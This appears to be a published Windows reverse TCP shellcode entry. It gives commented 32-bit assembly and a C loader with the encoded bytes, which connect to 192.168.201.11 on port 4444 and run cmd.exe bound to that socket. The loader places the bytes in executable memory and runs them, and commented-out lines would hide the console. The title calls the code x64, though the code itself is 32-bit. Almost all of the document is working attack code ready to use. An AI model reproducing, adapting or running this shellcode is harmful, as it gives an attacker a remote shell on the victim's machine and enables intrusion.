Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode
  1. # Title:
  2. Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)
  3. /*
  4.  
  5. MIT License
  6.  
  7. Copyright (c) 2021 Xenofon Vassilakopoulos
  8.  
  9. Permission is hereby granted, free of charge, to any person obtaining a copy
  10. of this software and associated documentation files (the "Software"), to deal
  11. in the Software without restriction, including without limitation the rights
  12. to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
  13. copies of the Software, and to permit persons to whom the Software is
  14. furnished to do so, subject to the following conditions:
  15.  
  16. The above copyright notice and this permission notice shall be included in all
  17. copies or substantial portions of the Software.
  18.  
  19. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
  20. IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
  21. FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
  22. AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
  23. LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
  24. OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
  25. SOFTWARE.
  26.  
  27.  
  28. [BITS 32]
  29.  
  30. global _start
  31.  
  32. section .text
  33.  
  34. _start:
  35.  
  36. ; Locate Kernelbase.dll address
  37. XOR ECX, ECX ;zero out ECX
  38. MOV EAX, FS:[ecx + 0x30] ;EAX = PEB
  39. MOV EAX, [EAX + 0x0c] ;EAX = PEB->Ldr
  40. MOV ESI, [EAX + 0x14] ;ESI = PEB->Ldr.InMemoryOrderModuleList
  41. LODSD ;memory address of the second list entry structure
  42. XCHG EAX, ESI ;EAX = ESI , ESI = EAX
  43. LODSD ;memory address of the third list entry structure
  44. XCHG EAX, ESI ;EAX = ESI , ESI = EAX
  45. LODSD ;memory address of the fourth list entry structure
  46. MOV EBX, [EAX + 0x10] ;EBX = Base address
  47.  
  48. ; Export Table
  49. MOV EDX, DWORD [EBX + 0x3C] ;EDX = DOS->e_lfanew
  50. ADD EDX, EBX ;EDX = PE Header
  51. MOV EDX, DWORD [EDX + 0x78] ;EDX = Offset export table
  52. ADD EDX, EBX ;EDX = Export table
  53. MOV ESI, DWORD [EDX + 0x20] ;ESI = Offset names table
  54. ADD ESI, EBX ;ESI = Names table
  55. XOR ECX, ECX ;EXC = 0
  56.  
  57. GetFunction :
  58.  
  59. INC ECX; increment counter
  60. LODSD ;Get name offset
  61. ADD EAX, EBX ;Get function name
  62. CMP dword [EAX], 0x50746547 ;"PteG"
  63. JNZ SHORT GetFunction ;jump to GetFunction label if not "GetP"
  64. CMP dword [EAX + 0x4], 0x41636F72 ;"rocA"
  65. JNZ SHORT GetFunction ;jump to GetFunction label if not "rocA"
  66. CMP dword [EAX + 0x8], 0x65726464 ;"ddre"
  67. JNZ SHORT GetFunction ;jump to GetFunction label if not "ddre"
  68.  
  69. MOV ESI, DWORD [EDX + 0x24] ;ESI = Offset ordinals
  70. ADD ESI, EBX ;ESI = Ordinals table
  71. MOV CX, WORD [ESI + ECX * 2] ;CX = Number of function
  72. DEC ECX ;Decrement the ordinal
  73. MOV ESI, DWORD [EDX + 0x1C] ;ESI = Offset address table
  74. ADD ESI, EBX ;ESI = Address table
  75. MOV EDX, DWORD [ESI + ECX * 4] ;EDX = Pointer(offset)
  76. ADD EDX, EBX ;EDX = GetProcAddress
  77.  
  78. ; Get the Address of LoadLibraryA function
  79. XOR ECX, ECX ;ECX = 0
  80. PUSH EBX ;Kernel32 base address
  81. PUSH EDX ;GetProcAddress
  82. PUSH ECX ;0
  83. PUSH 0x41797261 ;"Ayra"
  84. PUSH 0x7262694C ;"rbiL"
  85. PUSH 0x64616F4C ;"daoL"
  86. PUSH ESP ;"LoadLibrary"
  87. PUSH EBX ;Kernel32 base address
  88. MOV ESI, EBX ;save the kernel32 address in esi for later
  89. CALL EDX ;GetProcAddress(LoadLibraryA)
  90.  
  91. ADD ESP, 0xC ;pop "LoadLibraryA"
  92. POP EDX ;EDX = 0
  93. PUSH EAX ;EAX = LoadLibraryA
  94. PUSH EDX ;ECX = 0
  95. MOV DX, 0x6C6C ;"ll"
  96. PUSH EDX
  97. PUSH 0x642E3233 ;"d.23"
  98. PUSH 0x5F327377 ;"_2sw"
  99. PUSH ESP ;"ws2_32.dll"
  100. CALL EAX ;LoadLibrary("ws2_32.dll")
  101.  
  102. ADD ESP, 0x10 ;Clean stack
  103. MOV EDX, [ESP + 0x4] ;EDX = GetProcAddress
  104. PUSH 0x61617075 ;"aapu"
  105. SUB word [ESP + 0x2], 0x6161 ;"pu" (remove "aa")
  106. PUSH 0x74726174 ;"trat"
  107. PUSH 0x53415357 ;"SASW"
  108. PUSH ESP ;"WSAStartup"
  109. PUSH EAX ;ws2_32.dll address
  110. MOV EDI, EAX ;save ws2_32.dll to use it later
  111. CALL EDX ;GetProcAddress(WSAStartup)
  112.  
  113. ; Call WSAStartUp
  114. XOR EBX, EBX ;zero out ebx register
  115. MOV BX, 0x0190 ;EAX = sizeof(struct WSAData)
  116. SUB ESP, EBX ;allocate space for the WSAData structure
  117. PUSH ESP ;push a pointer to WSAData structure
  118. PUSH EBX ;Push EBX as wVersionRequested
  119. CALL EAX ;Call WSAStartUp
  120.  
  121. ;Find the address of WSASocketA
  122. ADD ESP, 0x10 ;Align the stack
  123. XOR EBX, EBX ;zero out the EBX register
  124. ADD BL, 0x4 ;add 0x4 at the lower register BL
  125. IMUL EBX, 0x64 ;EBX = 0x190
  126. MOV EDX, [ESP + EBX] ;EDX has the address of GetProcAddress
  127. PUSH 0x61614174 ;"aaAt"
  128. SUB word [ESP + 0x2], 0x6161 ;"At" (remove "aa")
  129. PUSH 0x656b636f ;"ekco"
  130. PUSH 0x53415357 ;"SASW"
  131. PUSH ESP ;"WSASocketA", GetProcAddress 2nd argument
  132. MOV EAX, EDI ;EAX now holds the ws2_32.dll address
  133. PUSH EAX ;push the first argument of GetProcAddress
  134. CALL EDX ;call GetProcAddress
  135. PUSH EDI ;save the ws2_32.dll address to use it later
  136.  
  137. ;call WSASocketA
  138. XOR ECX, ECX ;zero out ECX register
  139. PUSH EDX ;null value for dwFlags argument
  140. PUSH EDX ;zero value since we dont have an existing socket group
  141. PUSH EDX ;null value for lpProtocolInfo
  142. MOV DL, 0x6 ;IPPROTO_TCP
  143. PUSH EDX ;set the protocol argument
  144. INC ECX ;SOCK_STREAM(TCP)
  145. PUSH ECX ;set the type argument
  146. INC ECX ;AF_INET(IPv4)
  147. PUSH ECX ;set the ddress family specification argument
  148. CALL EAX ;call WSASocketA
  149. XCHG EAX, ECX ;save the socket returned from WSASocketA at EAX to ECX in order to use it later
  150.  
  151. ;Find the address of connect
  152. POP EDI ;load previously saved ws2_32.dll address to ECX
  153. ADD ESP, 0x10 ;Align stack
  154. XOR EBX, EBX ;zero out EBX
  155. ADD BL, 0x4 ;add 0x4 to lower register BL
  156. IMUL EBX, 0x63 ;EBX = 0x18c
  157. MOV EDX, [ESP + EBX] ;EDX has the address of GetProcAddress
  158. PUSH 0x61746365 ;"atce"
  159. SUB word [ESP + 0x3], 0x61 ;"tce" (remove "a")
  160. PUSH 0x6e6e6f63 ;"nnoc"
  161. PUSH ESP ;"connect", second argument of GetProcAddress
  162. PUSH EDI ;ws32_2.dll address, first argument of GetProcAddress
  163. XCHG ECX, EBP
  164. CALL EDX ;call GetProcAddress
  165.  
  166. ;call connect
  167. PUSH 0x0bc9a8c0 ;sin_addr set to 192.168.201.11
  168. PUSH word 0x5c11 ;port = 4444
  169. XOR EBX, EBX ;zero out EBX
  170. add BL, 0x2 ;TCP protocol
  171. PUSH word BX ;push the protocol value on the stack
  172. MOV EDX, ESP ;pointer to sockaddr structure (IP,Port,Protocol)
  173. PUSH byte 16 ;the size of sockaddr - 3rd argument of connect
  174. PUSH EDX ;push the sockaddr - 2nd argument of connect
  175. PUSH EBP ;socket descriptor = 64 - 1st argument of connect
  176. XCHG EBP, EDI
  177. CALL EAX ;execute connect;
  178.  
  179. ;Find the address of CreateProcessA
  180. ADD ESP, 0x14 ;Clean stack
  181. XOR EBX, EBX ;zero out EBX
  182. ADD BL, 0x4 ;add 0x4 to lower register BL
  183. IMUL EBX, 0x62 ;EBX = 0x194
  184. MOV EDX, [ESP + EBX] ;EDX has the address of GetProcAddress
  185. PUSH 0x61614173 ;"aaAs"
  186. SUB dword [ESP + 0x2], 0x6161 ;"As"
  187. PUSH 0x7365636f ;"seco"
  188. PUSH 0x72506574 ;"rPet"
  189. PUSH 0x61657243 ;"aerC"
  190. PUSH ESP ;"CreateProcessA" - 2nd argument of GetProcAddress
  191. MOV EBP, ESI ;move the kernel32.dll to EBP
  192. PUSH EBP ;kernel32.dll address - 1st argument of GetProcAddress
  193. CALL EDX ;execute GetProcAddress
  194. PUSH EAX ;address of CreateProcessA
  195. LEA EBP, [EAX] ;EBP now points to the address of CreateProcessA
  196.  
  197. ;call CreateProcessA
  198. PUSH 0x61646d63 ;"admc"
  199. SUB word [ESP + 0x3], 0x61 ;"dmc" ( remove a)
  200. MOV ECX, ESP ;ecx now points to "cmd" string
  201. XOR EDX, EDX ;zero out EDX
  202. SUB ESP, 16
  203. MOV EBX, esp ;pointer for ProcessInfo
  204.  
  205. ;STARTUPINFOA struct
  206. PUSH EDI ;hStdError => saved socket
  207. PUSH EDI ;hStdOutput => saved socket
  208. PUSH EDI ;hStdInput => saved socket
  209. PUSH EDX ;lpReserved2 => NULL
  210. PUSH EDX ;cbReserved2 => NULL
  211. XOR EAX, EAX ;zero out EAX register
  212. INC EAX ;EAX => 0x00000001
  213. ROL EAX, 8 ;EAX => 0x00000100
  214. PUSH EAX ;dwFlags => STARTF_USESTDHANDLES 0x00000100
  215. PUSH EDX ;dwFillAttribute => NULL
  216. PUSH EDX ;dwYCountChars => NULL
  217. PUSH EDX ;dwXCountChars => NULL
  218. PUSH EDX ;dwYSize => NULL
  219. PUSH EDX ;dwXSize => NULL
  220. PUSH EDX ;dwY => NULL
  221. PUSH EDX ;dwX => NULL
  222. PUSH EDX ;pTitle => NULL
  223. PUSH EDX ;pDesktop => NULL
  224. PUSH EDX ;pReserved => NULL
  225. XOR EAX, EAX ;zero out EAX
  226. ADD AL, 44 ;cb => 0x44 (size of struct)
  227. PUSH EAX ;eax points to STARTUPINFOA
  228.  
  229. ;ProcessInfo struct
  230. MOV EAX, ESP ;pStartupInfo
  231. PUSH EBX ;pProcessInfo
  232. PUSH EAX ;pStartupInfo
  233. PUSH EDX ;CurrentDirectory => NULL
  234. PUSH EDX ;pEnvironment => NULL
  235. PUSH EDX ;CreationFlags => 0
  236. XOR EAX, EAX ;zero out EAX register
  237. INC EAX ;EAX => 0x00000001
  238. PUSH EAX ;InheritHandles => TRUE => 1
  239. PUSH EDX ;pThreadAttributes => NULL
  240. PUSH EDX ;pProcessAttributes => NULL
  241. PUSH ECX ;pCommandLine => pointer to "cmd"
  242. PUSH EDX ;ApplicationName => NULL
  243. CALL EBP ;execute CreateProcessA
  244.  
  245. */
  246.  
  247. #include <windows.h>
  248. #include <iostream>
  249. #include <stdlib.h>
  250.  
  251. char code[] =
  252. "\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x96\xad\x8b"
  253. "\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31"
  254. "\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f"
  255. "\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde"
  256. "\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x31\xc9\x53"
  257. "\x52\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54"
  258. "\x53\x89\xde\xff\xd2\x83\xc4\x0c\x5a\x50\x52\x66\xba\x6c\x6c\x52\x68\x33"
  259. "\x32\x2e\x64\x68\x77\x73\x32\x5f\x54\xff\xd0\x83\xc4\x10\x8b\x54\x24\x04"
  260. "\x68\x75\x70\x61\x61\x66\x81\x6c\x24\x02\x61\x61\x68\x74\x61\x72\x74\x68"
  261. "\x57\x53\x41\x53\x54\x50\x89\xc7\xff\xd2\x31\xdb\x66\xbb\x90\x01\x29\xdc"
  262. "\x54\x53\xff\xd0\x83\xc4\x10\x31\xdb\x80\xc3\x04\x6b\xdb\x64\x8b\x14\x1c"
  263. "\x68\x74\x41\x61\x61\x66\x81\x6c\x24\x02\x61\x61\x68\x6f\x63\x6b\x65\x68"
  264. "\x57\x53\x41\x53\x54\x89\xf8\x50\xff\xd2\x57\x31\xc9\x52\x52\x52\xb2\x06"
  265. "\x52\x41\x51\x41\x51\xff\xd0\x91\x5f\x83\xc4\x10\x31\xdb\x80\xc3\x04\x6b"
  266. "\xdb\x63\x8b\x14\x1c\x68\x65\x63\x74\x61\x66\x83\x6c\x24\x03\x61\x68\x63"
  267. "\x6f\x6e\x6e\x54\x57\x87\xcd\xff\xd2\x68\xc0\xa8\xc9\x0b\x66\x68\x11\x5c"
  268. "\x31\xdb\x80\xc3\x02\x66\x53\x89\xe2\x6a\x10\x52\x55\x87\xef\xff\xd0\x83"
  269. "\xc4\x14\x31\xdb\x80\xc3\x04\x6b\xdb\x62\x8b\x14\x1c\x68\x73\x41\x61\x61"
  270. "\x81\x6c\x24\x02\x61\x61\x00\x00\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72"
  271. "\x68\x43\x72\x65\x61\x54\x89\xf5\x55\xff\xd2\x50\x8d\x28\x68\x63\x6d\x64"
  272. "\x61\x66\x83\x6c\x24\x03\x61\x89\xe1\x31\xd2\x83\xec\x10\x89\xe3\x57\x57"
  273. "\x57\x52\x52\x31\xc0\x40\xc1\xc0\x08\x50\x52\x52\x52\x52\x52\x52\x52\x52"
  274. "\x52\x52\x31\xc0\x04\x2c\x50\x89\xe0\x53\x50\x52\x52\x52\x31\xc0\x40\x50"
  275. "\x52\x52\x51\x52\xff\xd5";
  276.  
  277. int main(int argc, char** argv)
  278. {
  279. //HWND hWnd = GetConsoleWindow();
  280. //ShowWindow(hWnd, SW_HIDE);
  281. printf("Shellcode Length: %d\n", strlen(code));
  282. void* exec = VirtualAlloc(0, strlen(code), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  283. memcpy(exec, code, sizeof(code));
  284. ((void(*)())exec)();
  285.  
  286. return 0;
  287. }